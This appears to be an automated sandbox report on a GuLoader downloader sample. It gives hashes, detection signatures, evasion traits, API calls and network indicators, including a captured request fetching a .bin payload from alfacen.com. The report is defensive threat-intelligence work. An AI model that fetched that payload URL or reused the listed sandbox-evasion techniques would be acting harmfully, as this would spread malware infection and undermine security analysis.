Windows Analysis Report
3507071243740008011.exe

Overview

General Information

Sample name: 3507071243740008011.exe
Analysis ID: 1538168
MD5: 300ffb3fd65eb4a84a14802828f91e38
SHA1: 937574595a8e68f7a77b95a7f99b530007f9fc5c
SHA256: 24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
Tags: exe, user-Racco42

Detection

GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormally high CPU usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3507071243740008011.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
    • 3507071243740008011.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000000.00000002.2445417513.0000000005438000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: 3507071243740008011.exe | Avira: detected
    Source: 3507071243740008011.exe | ReversingLabs: Detection: 31%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: 3507071243740008011.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49839 version: TLS 1.2
    Source: 3507071243740008011.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004065C5 FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00402862 FindFirstFileW
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected:
        GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
        User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: alfacen.com
        Cache-Control: no-cache
    Source: global traffic | DNS traffic detected: DNS query: alfacen.com
    Source: 3507071243740008011.exe, 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000000.1654398706.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000004.00000000.2441682476.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767646001.0000000006B34000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727893517.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfacen.com/
    Source: 3507071243740008011.exe, 00000004.00000002.2767646001.0000000006B34000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791020426.0000000036160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.bin
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknown | Network traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49839
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA35C0 NtCreateMutant,LdrInitializeThunk
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2DF0 NtQuerySystemInformation,LdrInitializeThunk
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA3090 NtSetValueKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA3010 NtOpenDirectoryObject
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA3D70 NtOpenThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA3D10 NtOpenProcessToken
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA39B0 NtGetContextThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA4650 NtSuspendThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA4340 NtSetContextThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2EE0 NtQueueApcThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2E80 NtReadVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2EA0 NtAdjustPrivilegesToken
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2E30 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2FE0 NtCreateFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2F90 NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2FB0 NtResumeThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2FA0 NtQuerySection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2F60 NtCreateProcessEx
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2F30 NtCreateSection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2CC0 NtQueryVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2CF0 NtOpenProcess
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2CA0 NtQueryInformationToken
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2C70 NtFreeVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2C60 NtCreateKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2C00 NtQueryInformationProcess
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2DD0 NtDelayExecution
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2DB0 NtEnumerateKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2D10 NtMapViewOfSection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2D00 NtSetInformationFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2D30 NtUnmapViewOfSection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2AD0 NtReadFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2AF0 NtWriteFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2AB0 NtWaitForSingleObject
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2BF0 NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2BE0 NtQueryValueKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2B80 NtQueryInformationFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2BA0 NtEnumerateValueKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA2B60 NtClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00404C62
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00406ADD
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004072B4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E216CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DB5630
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2F7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2F43F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E395C3
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0D5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E27571
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8D2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DB739A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2132D
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2F0E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E270E9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1F0CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3B16B
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DA516C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D79EB0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D33FD2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D33FD5
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2FFB1
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2FF09
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2FCF2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE9C32
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8FDC0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E27D73
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D73D40
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E21D5A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1DAC6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E11AA3
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0DAAC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DB5AA0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E27A46
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2FA49
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE3A6C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DADBF9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE5BF0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8FB80
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2FB76
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D738E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DDD800
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D79950
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8B950
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E05910
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D8C6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6C7C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D94750
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D70770
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1E4F6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E22446
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E14420
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E30591
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D70535
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF02C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E10274
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E303E6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7E3F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2A352
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E02000
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E281CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E241A2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E301AA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DF8158
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D60100
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0A118
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2EEDB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D82E90
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2CE93
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D70E59
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2EE26
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D62FC8
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7CFE0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DEEFA0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DE4F40
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E12F30
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D90F30
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36DB2F28
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D60CF2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E10CB5
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D70C00
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6ADE0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D88DBF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7AD00
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0CD1F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6EA80
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E26BD7
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E2AB40
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9E8F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D568B8
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D72840
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D7A840
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E3A9A6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D729A0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D86962
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36D5B970 appears 262 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DDEA12 appears 86 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DA5130 appears 58 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DEF290 appears 105 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DB7E54 appears 108 times
    Source: 3507071243740008011.exe | Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: 3507071243740008011.exe, 00000004.00000003.2727268386.0000000036AE9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: classification engine | Classification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004020FE CoCreateInstance
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File created: C:\Users\user\AppData\Roaming\pechay
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File created: C:\Users\user\AppData\Local\Temp\nslD521.tmp
    Source: 3507071243740008011.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File read: C:\Users\user\Desktop\3507071243740008011.exe
    Source: unknown | Process created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wkscli.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: 3507071243740008011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp
